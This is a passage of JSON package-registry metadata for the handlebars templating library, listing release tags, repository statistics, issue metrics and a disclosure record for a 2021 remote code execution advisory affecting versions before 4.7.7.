:"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9/manifests"},{"name":"1.0.0-rc.3","sha":"bc8214cb7cb4b04180f4df33439ac61a92e1123f","kind":"commit","published_at":"2013-02-15T05:58:20.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3/manifests"},{"name":"v1.0.8","sha":"5ac29dcb50cea15bee830304e391afd7375d56aa","kind":"tag","published_at":"2013-01-19T08:12:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8/manifests"},{"name":"1.0.rc.2","sha":"9453c6d9d23f05c596123560ff9b5923e4eed954","kind":"commit","published_at":"2013-01-19T01:13:40.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2/manifests"},{"name":"1.0.rc.1","sha":"ce74c36118ffed1779889d97e6a2a1028ae61510","kind":"commit","published_at":"2012-09-16T04:11:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1/manifests"},{"name":"v1.0.6-2","sha":"08e580a23be5abd74bdb757063bb783f4f240ea3","kind":"commit","published_at":"2012-07-31T16:50:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6-2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6-2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.6-2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2/manifests"},{"name":"v1.0.6","sha":"f5289a35ecdbd35898fa6d291600ac9427930b44","kind":"commit","published_at":"2012-07-23T20:40:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6/manifests"},{"name":"v1.0.6beta","sha":"fe7d16de9196718bbe716d684f2a1c349f24284b","kind":"commit","published_at":"2012-07-23T15:36:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.6beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta/manifests"},{"name":"v1.0.5beta","sha":"bef909f5cbf855f38f58c727d07dbe8330d4c370","kind":"commit","published_at":"2012-02-09T17:06:11.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.5beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.5beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.5beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta/manifests"},{"name":"1.0.0.beta.1","sha":"81071dd22c5295d796ab702d910e167029e178c4","kind":"commit","published_at":"2011-05-04T03:39:24.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0.beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0.beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0.beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1/manifests"},{"name":"0.9.0.pre.4","sha":"d7f93c09e7031b28b27296b1e8f8e8bc801e56c9","kind":"tag","published_at":"2011-02-15T21:44:08.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/0.9.0.pre.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/0.9.0.pre.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@0.9.0.pre.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4/manifests"}]},"repo_metadata_updated_at":"2025-11-04T01:08:49.190Z","dependent_packages_count":35,"downloads":null,"downloads_period":null,"dependent_repos_count":5,"rankings":{"downloads":null,"dependent_repos_count":10.913714222787293,"dependent_packages_count":1.8832904524021663,"stargazers_count":1.4223788405129696,"forks_count":3.370541300843937,"docker_downloads_count":null,"average":4.397481204136591},"purl":"pkg:maven/org.webjars.npm/handlebars","advisories":[{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWYyanYtcjlyZi03OTg4","url":"https://github.com/advisories/GHSA-f2jv-r9rf-7988","title":"Remote code execution in handlebars when compiling templates","description":"The package handlebars before 4.7.7 are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2021-05-06T15:57:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-23369","https://github.com/handlebars-lang/handlebars.js/commit/b6d3de7123eebba603e321f04afdbae608e8fea8","https://github.com/handlebars-lang/handlebars.js/commit/f0589701698268578199be25285b2ebea1c1e427","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074950","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074951","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074952","https://snyk.io/vuln/SNYK-JS-HANDLEBARS-1056767","https://security.netapp.com/advisory/ntap-20210604-0008/","https://github.com/advisories/GHSA-f2jv-r9rf-7988"],"source_kind":"github","identifiers":["GHSA-f2jv-r9rf-7988","CVE-2021-23369"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","blast_radius":0.0,"created_at":"2022-12-21T16:11:56.348Z","updated_at":"2026-07-14T18:08:05.617Z","epss_percentage":0.07028,"epss_percentile":0.93353,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWYyanYtcjlyZi03OTg4","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWYyanYtcjlyZi03OTg4","packages":[{"ecosystem":"maven","package_name":"org.webjars.bowergithub.wycats:handlebars.js","versions":[{"first_patched_version":"4.7.7","vulnerable_version_range":"\u003c 4.7.7"}],"purl":null},{"ecosystem":"maven","package_name":"org.webjars.npm:handlebars","versions":[{"first_patched_version":"4.7.7","vulnerable_version_range":"\u003c 4.7.7"}],"purl":null},{"ecosystem":"maven","package_name":"org.webjars:handlebars","versions":[{"first_patched_version":"4.7.7","vulnerable_version_range":"\u003c 4.7.7"}],"purl":null},{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.7.7","vulnerable_version_range":"\u003c 4.7.7"}],"purl":"pkg:npm/handlebars"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWYyanYtcjlyZi03OTg4/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.webjars.npm:handlebars","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.webjars.npm:handlebars","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.webjars.npm:handlebars/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-29T02:01:58.807Z","issues_count":151,"pull_requests_count":103,"avg_time_to_close_issue":20331079.744897958,"avg_time_to_close_pull_request":20206605.742857143,"issues_closed_count":98,"pull_requests_closed_count":70,"pull_request_authors_count":40,"issue_authors_count":134,"avg_comments_per_issue":3.1788079470198674,"avg_comments_per_pull_request":1.7087378640776698,"merged_pull_requests_count":42,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":22,"past_year_pull_requests_count":14,"past_year_avg_time_to_close_issue":3394153.3333333335,"past_year_avg_time_to_close_pull_request":115209.33333333333,"past_year_issues_closed_count":6,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":7,"past_year_issue_authors_count":20,"past_year_avg_comments_per_issue":0.7727272727272727,"past_year_avg_comments_per_pull_request":0.5,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":2,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/issues","maintainers":[{"login":"jaylinski","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"},{"login":"nknapp","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nknapp"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:handlebars/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:handlebars/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:handlebars/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:handlebars/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:handlebars/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:handlebars/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://repo.maven.apache.org/maven2","ecosystem":"maven","default":true,"packages_count":612498,"maintainers_count":0,"namespaces_count":80807,"keywords_count":34879,"github":"maven-central","metadata":{"funded_packages_count":37828},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-06-10T05:05:55.821Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":1813576,"name":"handlebars","ecosystem":"npm","description":"Handlebars provides the power necessary to let you build semantic templates effectively with no frustration","homepage":"https://handlebarsjs.com/","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","keywords_array":["handlebars","mustache","template","html"],"namespace":null,"versions_count":81,"first_release_published_at":"2011-08-22T07:43:36.484Z","latest_release_published_at":"2026-03-26T20:46:39.280Z","latest_release_number":"4.7.9","last_synced_at":"2026-07-21T19:16:09.186Z","created_at":"2022-04-09T16:55:29.206Z","updated_at":"2026-07-22T12:41:28.529Z","registry_url":"https://www.npmjs.com/package/handlebars","install_command":"npm install handlebars","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"legacy":"3.0.8","latest":"4.7.9"}},"repo_metadata":{"id":998342,"uuid":"809601","full_name":"handlebars-lang/handlebars.js","owner":"handlebars-lang","description":"Minimal templating on steroids.","archived":false,"fork":false,"pushed_at":"2024-09-03T20:27:37.000Z","size":4058,"stargazers_count":17990,"open_issues_count":94,"forks_count":2042,"subscribers_count":451,"default_branch":"master","last_synced_at":"2024-10-29T20:37:55.598Z","etag":null,"topics":["handlebars","mustache","templates"],"latest_commit_sha":null,"homepage":"http://handlebarsjs.com","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":"linkedin/Burrow","license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/handlebars-lang.png","metadata":{"files":{"readme":"README.markdown","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2010-07-31T18:54:46.000Z","updated_at":"2024-10-29T10:55:41.000Z","dependencies_parsed_at":"2023-09-22T06:08:40.588Z","dependency_job_id":"704e5df2-5b6b-4f79-8e30-c8540825a30e","html_url":"https://github.com/handlebars-lang/handlebars.js","commit_stats":{"total_commits":1718,"total_committers":206,"mean_commits":8.339805825242719,"dds":0.519208381839348,"last_synced_commit":"f422bfdf3ed321c32c6eecfaa778de46275fb76d"},"previous_names":["wycats/handlebars.js"],"tags_count":89,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222119788,"owners_count":16934949,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"handlebars-lang","name":"The Handlebars Templating Language","uuid":"19378685","kind":"organization","description":"","email":null,"website":"https://handlebarsjs.com/","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/19378685?v=4","repositories_count":8,"last_synced_at":"2024-04-28T02:35:24.096Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/handlebars-lang","funding_links":[],"total_stars":17814,"followers":61,"following":0,"created_at":"2022-11-02T16:37:33.313Z","updated_at":"2024-04-28T02:35:25.495Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang/repositories"},"tags":[{"name":"v4.7.8","sha":"8dc3d2517b41d12b1e06f88a449f30d27c137c21","kind":"tag","published_at":"2023-08-01T21:10:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8/manifests"},{"name":"v4.7.7","sha":"a9a8e403213583ca90cb7c872d3a22796c37d961","kind":"tag","published_at":"2021-02-15T09:36:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7/manifests"},{"name":"v4.7.6","sha":"e6ad93ea01bcde1f8ddaa4b4ebe572dd616abfaa","kind":"tag","published_at":"2020-04-03T17:56:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6/manifests"},{"name":"v4.7.5","sha":"1fd2edee2a12fb228061fcde807905c6b14339c4","kind":"tag","published_at":"2020-04-02T19:09:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5/manifests"},{"name":"v4.7.4","sha":"7adc19ab40917389fc1372d19677f1d024ec42b1","kind":"tag","published_at":"2020-04-01T17:20:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4/manifests"},{"name":"v3.0.8","sha":"16bd606fec0ada4c811eb7afe6bfd619d88f3d37","kind":"tag","published_at":"2020-02-23T10:02:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8/manifests"},{"name":"v4.7.3","sha":"c9789691af60b446f12f75dd9762f9d8fd3f36eb","kind":"tag","published_at":"2020-02-05T05:10:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3/manifests"},{"name":"v4.7.2","sha":"586e672c8bba7db787bc9bfe9a9fde4ec98d5b4f","kind":"tag","published_at":"2020-01-13T20:53:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2/manifests"},{"name":"v4.7.1","sha":"14ba3d0c43d75bcfcdbfb7c95c9fac99d88a17c8","kind":"tag","published_at":"2020-01-12T12:21:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1/manifests"},{"name":"v4.7.0","sha":"0d5c807017f8ba6c6d947f9d6852033c8faa2e49","kind":"tag","published_at":"2020-01-10T16:24:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"91a1b5d2f456cb733cbd88149fc9270973db79d7","kind":"tag","published_at":"2020-01-08T22:45:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.6.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0/manifests"},{"name":"v4.5.3","sha":"c819c8b533934d2ac18001d7eb27a3205b00c2f3","kind":"tag","published_at":"2019-11-18T07:10:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3/manifests"},{"name":"v4.5.2","sha":"8de121d21c88a6ab877e3a0eec9daaac483f3bf0","kind":"tag","published_at":"2019-11-13T21:07:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2/manifests"},{"name":"v4.5.1","sha":"7ef86173abb446cf564ad6dc2646a4c361e2ab9f","kind":"tag","published_at":"2019-10-29T04:42:23.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1/manifests"},{"name":"v4.5.0","sha":"b24797da01afd4e849fdb315dea8335792974522","kind":"tag","published_at":"2019-10-28T18:47:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0/manifests"},{"name":"v4.4.5","sha":"8e1cce79186ab6caeb8c6ec9c1f8bcfa1a40e83d","kind":"tag","published_at":"2019-10-20T21:08:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5/manifests"},{"name":"v4.4.4","sha":"2ab261eab7835e9c80ad1cb7ef9fc9b0f46d6a57","kind":"tag","published_at":"2019-10-20T19:33:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4/manifests"},{"name":"v4.4.3","sha":"2e53fba68f8c51f9aca97615944fdbdeba94ff62","kind":"tag","published_at":"2019-10-08T20:05:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3/manifests"},{"name":"v4.4.2","sha":"b793350fec0bb652c0bb2658089d7002af27a76b","kind":"tag","published_at":"2019-10-02T20:4